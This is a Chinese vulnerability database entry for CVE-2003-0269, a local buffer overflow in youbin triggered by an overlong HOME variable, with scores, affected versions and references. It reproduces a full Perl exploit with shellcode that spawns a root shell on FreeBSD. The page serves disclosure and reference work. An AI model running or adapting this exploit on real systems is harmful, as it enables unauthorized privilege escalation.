CVE-2003-0269
CVSS7.2
发布时间 :2003-05-27 00:00:00
修订时间 :2016-10-17 22:31:28
NMCOES    

[原文]Buffer overflow in youbin allows local users to gain privileges via a long HOME environment variable.


[CNNVD]Youbin HOME缓冲区溢出漏洞(CNNVD-200305-079)

        youbin 存在缓冲区溢出漏洞。本地用户可以通过超长的HOME环境变量获取权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:youbin:youbin:2.5
cpe:/a:youbin:youbin:3.4
cpe:/a:youbin:youbin:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0269
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0269
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-079
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0053.html
(UNKNOWN)  VULNWATCH  20030506 youbin local root exploit + advisory
http://lists.grok.org.uk/pipermail/full-disclosure/2003-May/004892.html
(UNKNOWN)  FULLDISC  20030506 youbin local root exploit + advisory
http://marc.info/?l=bugtraq&m=105223947528794&w=2
(UNKNOWN)  BUGTRAQ  20030506 youbin local root exploit + advisory
http://www.securityfocus.com/bid/7503
(VENDOR_ADVISORY)  BID  7503
http://xforce.iss.net/xforce/xfdb/11949
(UNKNOWN)  XF  youbin-home-bo(11949)

- 漏洞信息

Youbin HOME缓冲区溢出漏洞
高危 缓冲区溢出
2003-05-27 00:00:00 2005-10-20 00:00:00
本地  
        youbin 存在缓冲区溢出漏洞。本地用户可以通过超长的HOME环境变量获取权限。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22566)

Youbin 2.5/3.0/3.4 HOME Buffer Overflow Vulnerability (EDBID:22566)
freebsd local
2003-05-06 Verified
0 Knud Erik Hojgaard
N/A [点击下载]
source: http://www.securityfocus.com/bid/7503/info

It has been reported that youbin is vulnerable to a locally exploitable buffer overflow. The problem is said to occur while processing environment variables. Specifically, an internal memory buffer may be overrun while handling a HOME environment variable containing excessive data. This condition may be exploited by attackers to ultimately execute instructions with the privileges of the youbin process, typically root.

It should be noted that although this vulnerability has been reported to affect youbin version 3.4, previous versions might also be affected.

#!/usr/bin/perl
# DSR-youbin.pl - kokaninATdtors.net vs. /usr/ports/mail/youbin
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# shellcode by eSDee, he's cool
# youbin-3.4          Mail arrival notification service package

$len = 512;
$ret = pack("l",0xbfbffd68);
$nop = "\x90";
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

for ($i = 0; $i < $len - length($shellcode); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
local($ENV{'HOME'}) = $ret x 259;
system("youbin");
		

- 漏洞信息

6290
youbin HOME Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in youbin. The issue is triggered due to improper bounds checking resulting in a buffer overflow. By passing an overly long HOME environment variable to youbin, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-05-06 Unknow
2003-05-06 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Youbin HOME Buffer Overflow Vulnerability
Boundary Condition Error 7503
No Yes
2003-05-06 12:00:00 2009-07-11 09:07:00
Discovery of this vulnerability has been credited to Knud Erik Højgaard of dtors security research.

- 受影响的程序版本

youbin youbin 3.4
youbin youbin 3.0
youbin youbin 2.5

- 漏洞讨论

It has been reported that youbin is vulnerable to a locally exploitable buffer overflow. The problem is said to occur while processing environment variables. Specifically, an internal memory buffer may be overrun while handling a HOME environment variable containing excessive data. This condition may be exploited by attackers to ultimately execute instructions with the privileges of the youbin process, typically root.

It should be noted that although this vulnerability has been reported to affect youbin version 3.4, previous versions might also be affected.

- 漏洞利用

The following proof of concept has been supplied:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站